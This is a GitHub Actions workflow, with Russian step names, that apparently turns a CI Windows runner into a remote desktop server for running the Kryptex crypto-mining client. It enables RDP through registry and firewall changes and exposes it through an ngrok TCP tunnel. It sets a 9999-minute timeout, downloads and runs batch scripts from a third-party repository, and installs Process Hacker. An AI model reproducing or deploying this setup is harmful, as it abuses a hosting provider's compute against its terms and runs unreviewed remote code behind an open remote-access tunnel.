name: launch

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-2016
    timeout-minutes: 9999

    steps:
    - name: Загрузка необходимого для запуска ПО.
      run: |
        Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/KryptexCore/main/files/install.bat -OutFile install.bat
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/KryptexCore/main/files/exit.bat -OutFile exit.bat
    - name: Распаковка Ngrok файла.
      run: Expand-Archive ngrok.zip
    - name: Подключение к учётной записи Ngrok.
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Включение доступа RDP.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Создание туннеля.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region eu 3389"'
    - name: Настройка VDS.
      run: |
        Remove-item "C:\Users\Public\Desktop\*.lnk" -Force
        cmd /c install.bat
    - name: Загрузка Process Hacker.
      run: |
        Invoke-WebRequest https://ci.appveyor.com/api/buildjobs/13enx0gti83o5h2r/artifacts/processhacker-3.0.4234-bin.zip -OutFile "ProcessHacker.zip"
    - name: Распаковка Process Hacker.
      run: |
        Expand-Archive ProcessHacker.zip
    - name: Установка Process hacker.
      run: |
        New-Item -ItemType SymbolicLink -Target "D:\a\KryptexCore\KryptexCore\ProcessHacker\64bit\ProcessHacker.exe" -Path "C:\Users\Public\Desktop\ProcessHacker.lnk"
    - name: Загрузка Kryptex.
      run: |
        Invoke-WebRequest https://d93adf58-7c6e-4915-8502-b53a3c913edb.selcdn.net/installer/4.15.20/kryptex-setup-4.15.20.exe -OutFile "kryptex-setup.exe"
        New-Item -ItemType SymbolicLink -Target "D:\a\KryptexCore\KryptexCore\kryptex-setup.exe" -Path "C:\Users\Public\Desktop\Kryptex Install.lnk"
    - name: Загрузка 7-Zip.
      run: |
        Invoke-WebRequest https://www.7-zip.org/a/7z1900-x64.exe -Outfile "7zip.exe"
        New-Item -ItemType SymbolicLink -Target "D:\a\KryptexCore\KryptexCore\7zip.exe" -Path "C:\Users\Public\Desktop\7zip-install.lnk"
    - name: Запуск виртуальной машины выполнен
      run: cmd /c exit.bat
